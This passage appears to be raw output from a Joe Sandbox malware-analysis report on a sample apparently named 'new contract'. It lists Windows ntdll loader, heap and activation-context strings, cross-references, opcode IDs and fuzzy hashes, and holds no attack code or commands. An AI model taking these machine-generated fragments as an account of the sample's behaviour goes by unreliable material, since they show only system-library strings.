• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016954E2
• double initialized or corrupted critical section, xrefs: 01695508
• Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016954CE
• Thread is in a state in which it cannot own a critical section, xrefs: 01695543
• Invalid debug info address of this critical section, xrefs: 016954B6
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0169540A, 01695496, 01695519
• 8, xrefs: 016952E3
• Critical section address., xrefs: 01695502
• Address of the debug info found in the active list., xrefs: 016954AE, 016954FA
• Thread identifier, xrefs: 0169553A
• Critical section debug info address, xrefs: 0169541F, 0169552E
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
• Opcode ID: 785699c228474fffb78364bc0ea53687cf395abe7ddca3b1f73f3c538e3d8995
• Instruction ID: 8994ba9d461c7da84f86bb1280a13b37959cc491b21b28ff538c93cd1f6d9a25
• Opcode Fuzzy Hash: 785699c228474fffb78364bc0ea53687cf395abe7ddca3b1f73f3c538e3d8995
• Instruction Fuzzy Hash: A0819AB1E01358AFDF26CF99CC41BAEBBB9EB48710F10415AF506B7681D3B5A941CB60
                                                                                                                                                                            Strings
                                                                                                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016925EB
                                                                                                                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01692602
                                                                                                                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01692412
                                                                                                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01692624
                                                                                                                                                                            • @, xrefs: 0169259B
                                                                                                                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0169261F
                                                                                                                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01692409
                                                                                                                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016924C0
                                                                                                                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016922E4
                                                                                                                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01692498
                                                                                                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01692506
                                                                                                                                                                            Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
• API String ID: 0-4009184096
Strings
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
• API String ID: 0-2515994595
Strings
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
• API String ID: 0-1700792311
Strings
• AVRF: -*- final list of providers -*- , xrefs: 016A8B8F
• AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 016A8A67
• AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 016A8A3D
• VerifierFlags, xrefs: 016A8C50
• VerifierDebug, xrefs: 016A8CA5
• VerifierDlls, xrefs: 016A8CBD
• HandleTraces, xrefs: 016A8C8F
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
• API String ID: 0-3223716464
Strings
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
• API String ID: 0-1109411897
Strings
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
• API String ID: 0-792281065
Strings
• LdrpInitShimEngine, xrefs: 016799F4, 01679A07, 01679A30
• apphelp.dll, xrefs: 01616496
• Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01679A2A
• Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016799ED
• minkernel\ntdll\ldrinit.c, xrefs: 01679A11, 01679A3A
• Getting the shim engine exports failed with status 0x%08lx, xrefs: 01679A01
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-204845295
Strings
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016921BF
• SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01692178
• RtlGetAssemblyStorageRoot, xrefs: 01692160, 0169219A, 016921BA
• SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01692180
• SXS: %s() passed the empty activation context, xrefs: 01692165
• SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0169219F
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
• API String ID: 0-861424205
Strings
• minkernel\ntdll\ldrredirect.c, xrefs: 01698181, 016981F5
• minkernel\ntdll\ldrinit.c, xrefs: 0165C6C3
• Unable to build import redirection Table, Status = 0x%x, xrefs: 016981E5
• LdrpInitializeProcess, xrefs: 0165C6C4
• Loading import redirection DLL: '%wZ', xrefs: 01698170
• LdrpInitializeImportRedirection, xrefs: 01698177, 016981EB
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
• API String ID: 0-475462383
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 01662DF0: LdrInitializeThunk.NTDLL ref: 01662DFA
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660BA3
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660BB6
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660D60
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660D74
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1404860816-0
                                                                                                                                                                            • Opcode ID: 54ab76e53b756ff0c69347b5fd065d88283ce04f789416c4a663d725021a018b
                                                                                                                                                                            • Instruction ID: c78c349a46ba9bf35a2b814d350ceb4eaf3a89747f25f847d5e7a9a69c508312
                                                                                                                                                                            • Opcode Fuzzy Hash: 54ab76e53b756ff0c69347b5fd065d88283ce04f789416c4a663d725021a018b
                                                                                                                                                                            • Instruction Fuzzy Hash: B54239759007159FDB21CF68CC80BAAB7F9BF44314F1445AEE989AB241E770AA85CF60
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                            • API String ID: 0-379654539
                                                                                                                                                                            • Opcode ID: d6ac719d08df932bdebf4407be4bb1339b50a361af7dd5e244537080d4afe990
                                                                                                                                                                            • Instruction ID: aed819404688b28ebe655d5509301966b87b0f45c0d30406147a4eaba5da056d
                                                                                                                                                                            • Opcode Fuzzy Hash: d6ac719d08df932bdebf4407be4bb1339b50a361af7dd5e244537080d4afe990
                                                                                                                                                                            • Instruction Fuzzy Hash: 2DC1AA701087928FD721DF98C940B6AB7E5BF84304F04896EF9859BB50E3B4C94ACF56
                                                                                                                                                                            Strings
                                                                                                                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0165855E
                                                                                                                                                                            • @, xrefs: 01658591
                                                                                                                                                                            • LdrpInitializeProcess, xrefs: 01658422
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01658421
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-1918872054
                                                                                                                                                                            • Opcode ID: 58a84b655b1941d5020dfb45a1f7e6595ea3914ed03924f843ccdf691801fff3
                                                                                                                                                                            • Instruction ID: bf41b6cf54e710b9422abd702caced4621730166137709d462cb4f86abc11382
                                                                                                                                                                            • Opcode Fuzzy Hash: 58a84b655b1941d5020dfb45a1f7e6595ea3914ed03924f843ccdf691801fff3
                                                                                                                                                                            • Instruction Fuzzy Hash: EA918B71508345AFDB62DE26CC80FABBAEDFB84658F40092EFA8597151E730D904CB66
                                                                                                                                                                            Strings
                                                                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016922B6
                                                                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 016921DE
                                                                                                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016921D9, 016922B1
                                                                                                                                                                            • .Local, xrefs: 016528D8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                            • API String ID: 0-1239276146
                                                                                                                                                                            • Opcode ID: 62fbe577a47a232008a4b40a400e99d60e07e2eebbe461fe5b26a615b513df84
                                                                                                                                                                            • Instruction ID: 5610cc46abf0adac761209916e87baae62c08676d06807df2b3dd488d4dfc894
                                                                                                                                                                            • Opcode Fuzzy Hash: 62fbe577a47a232008a4b40a400e99d60e07e2eebbe461fe5b26a615b513df84
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EA1AB3190022ADBDB25CF69CCA4BA9B7B5BF58314F2541EED908AB351D7309E81CF94
                                                                                                                                                                            Strings
                                                                                                                                                                            • RtlDeactivateActivationContext, xrefs: 01693425, 01693432, 01693451
                                                                                                                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0169342A
                                                                                                                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01693437
                                                                                                                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01693456
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                            • API String ID: 0-1245972979
                                                                                                                                                                            • Opcode ID: e86505092a15415f339113dbc1dbec13886568171b959fcc1cadec25279be02b
                                                                                                                                                                            • Instruction ID: 8f27eb32b89c90019a09e2e3507a3fe30ddc4edda30106afc0811d7b089b81bc
                                                                                                                                                                            • Opcode Fuzzy Hash: e86505092a15415f339113dbc1dbec13886568171b959fcc1cadec25279be02b
                                                                                                                                                                            • Instruction Fuzzy Hash: FA6103366457129BDB228F2CCC45B2AB7E9AF80B50F15855DEC959B380EB30EC41CB95
                                                                                                                                                                            Strings
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016810AE
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0168106B
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01680FE5
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01681028
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                            • API String ID: 0-1468400865
                                                                                                                                                                            • Opcode ID: b55b768a4b7ec658d20f6fa5320b1ee5503e9af56e38f90c03838528ffb51759
                                                                                                                                                                            • Instruction ID: fedcaebce959fc9dfa20b889862cad424169a113520badcce46f3cd6198fce6e
                                                                                                                                                                            • Opcode Fuzzy Hash: b55b768a4b7ec658d20f6fa5320b1ee5503e9af56e38f90c03838528ffb51759
                                                                                                                                                                            • Instruction Fuzzy Hash: 6C71DAB1904315AFCB21EF18CC84B9B7BA9AB95764F00446CFD498B24AD734D589CFD2
                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpDynamicShimModule, xrefs: 0168A998
                                                                                                                                                                            • apphelp.dll, xrefs: 01642462
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0168A9A2
                                                                                                                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0168A992
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-176724104
                                                                                                                                                                            • Opcode ID: 40766f0747439a1d03b1a75d812afa49a3d9dbf286935927c574667ea479df9a
                                                                                                                                                                            • Instruction ID: ebab9575c0d7abab44d41c2f6418a22a26c7f51417e13d3ba16c16b9003b374d
                                                                                                                                                                            • Opcode Fuzzy Hash: 40766f0747439a1d03b1a75d812afa49a3d9dbf286935927c574667ea479df9a
                                                                                                                                                                            • Instruction Fuzzy Hash: 6D316B75650202EBDB31AF9DDC85E6ABBB5FB84B20F26415EFD0167349C7B05982CB80
                                                                                                                                                                            Strings
                                                                                                                                                                            • HEAP: , xrefs: 01633264
                                                                                                                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0163327D
                                                                                                                                                                            • HEAP[%wZ]: , xrefs: 01633255
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                            • API String ID: 0-617086771
                                                                                                                                                                            • Opcode ID: beb4f93cf4221fa00bb50b3e0cdf0ca7bb5b8a2b05167586006e82c9d2185acc
                                                                                                                                                                            • Instruction ID: 315edae81eab34eb9b95ec6791035038c414e411fc47745c0b14478b83b8dff8
                                                                                                                                                                            • Opcode Fuzzy Hash: beb4f93cf4221fa00bb50b3e0cdf0ca7bb5b8a2b05167586006e82c9d2185acc
                                                                                                                                                                            • Instruction Fuzzy Hash: D392BC71A042499FEB25CF68C8547AEBBF1FF89314F18805DE846AB391D734A946CF50
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                            • API String ID: 0-4253913091
                                                                                                                                                                            • Opcode ID: 540cf724d8eb5c73ed3811accd8ab1925d96d840c86a6d82eabbd7020dee3cbc
                                                                                                                                                                            • Instruction ID: e89b2cdae23f084df9e468ea54943c08b3c5819514cbeb15f401c40d6b443caa
                                                                                                                                                                            • Opcode Fuzzy Hash: 540cf724d8eb5c73ed3811accd8ab1925d96d840c86a6d82eabbd7020dee3cbc
                                                                                                                                                                            • Instruction Fuzzy Hash: BBF1AF30600606DFEB25DF68CC94B6AB7F6FF84704F1482A9E5569B381D734E986CB90
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID: $@
                                                                                                                                                                            • API String ID: 2994545307-1077428164
                                                                                                                                                                            • Opcode ID: 18d1ec9b677ef3d664547193d7980801f3c3d9b567a42612661e1d749525c64f
                                                                                                                                                                            • Instruction ID: 3df312599905ed2550ceab1a0d3e11de5adcc1d076c7ba6b153b84f7ed052a7a
                                                                                                                                                                            • Opcode Fuzzy Hash: 18d1ec9b677ef3d664547193d7980801f3c3d9b567a42612661e1d749525c64f
                                                                                                                                                                            • Instruction Fuzzy Hash: A9C26D716083519FEB25CF28CC81BABBBE5AF89754F04892DF98987341D734D845CBA2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                            • API String ID: 0-2779062949
                                                                                                                                                                            • Opcode ID: 66e3b462108e9cc2c115084768d791ba1aaf799aa98a00a9242dc8aa73e0f4da
                                                                                                                                                                            • Instruction ID: c8969d603df6a2c8806528b39df793f5656d61a34d2974e505bd757a7d70d722
                                                                                                                                                                            • Opcode Fuzzy Hash: 66e3b462108e9cc2c115084768d791ba1aaf799aa98a00a9242dc8aa73e0f4da
                                                                                                                                                                            • Instruction Fuzzy Hash: 4AA19E7191162A9BDB31DF68CC88BEAB7B9FF44710F0441EAEA08A7210D7359E84CF54
                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpCheckModule, xrefs: 0168A117
                                                                                                                                                                            • Failed to allocated memory for shimmed module list, xrefs: 0168A10F
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0168A121
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-161242083
                                                                                                                                                                            • Opcode ID: 85e42eb243bc58872ee6c8a24d88422aca71315fc50ba16f57a1f43f11134aa6
                                                                                                                                                                            • Instruction ID: 0a07079f10b82248c352056c2390c65a1010808ac2962a297c5c9ece3aec0d8e
                                                                                                                                                                            • Opcode Fuzzy Hash: 85e42eb243bc58872ee6c8a24d88422aca71315fc50ba16f57a1f43f11134aa6
                                                                                                                                                                            • Instruction Fuzzy Hash: 6271D070A00216DFDB25EFACCD80AAEB7F5FB44214F14816DE942A7351E774A942CB54
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                            • API String ID: 0-1334570610
                                                                                                                                                                            • Opcode ID: 178633fc1dabdd7e47d9d70bd53a90e00589c17cff79077cce49f916141e7d35
                                                                                                                                                                            • Instruction ID: 25f070452fa4f04a920b37fa30de2fa877c07550aaf0b773fd85771b36ab4225
                                                                                                                                                                            • Opcode Fuzzy Hash: 178633fc1dabdd7e47d9d70bd53a90e00589c17cff79077cce49f916141e7d35
                                                                                                                                                                            • Instruction Fuzzy Hash: 3E61AE706003059FDB29DF28C840B6ABBE2FF85704F14865DE8568B396D771E886CB95
                                                                                                                                                                            Strings
                                                                                                                                                                            • Failed to reallocate the system dirs string !, xrefs: 016982D7
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 016982E8
                                                                                                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 016982DE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-1783798831
                                                                                                                                                                            • Opcode ID: fd360fc302135ccd7204513fe1164ffa9e157b1338d116d5be0dd564da292ac7
                                                                                                                                                                            • Instruction ID: ba8eea6dcc79c3a657b37db413014c7a64b4514860774b04c4564647633516ad
                                                                                                                                                                            • Opcode Fuzzy Hash: fd360fc302135ccd7204513fe1164ffa9e157b1338d116d5be0dd564da292ac7
                                                                                                                                                                            • Instruction Fuzzy Hash: 2041E071504301ABCB21EB68DC44B6B7BEDEF89B60F00892EFA4897294E770D801CB95
                                                                                                                                                                            Strings
                                                                                                                                                                            • PreferredUILanguages, xrefs: 016DC212
                                                                                                                                                                            • @, xrefs: 016DC1F1
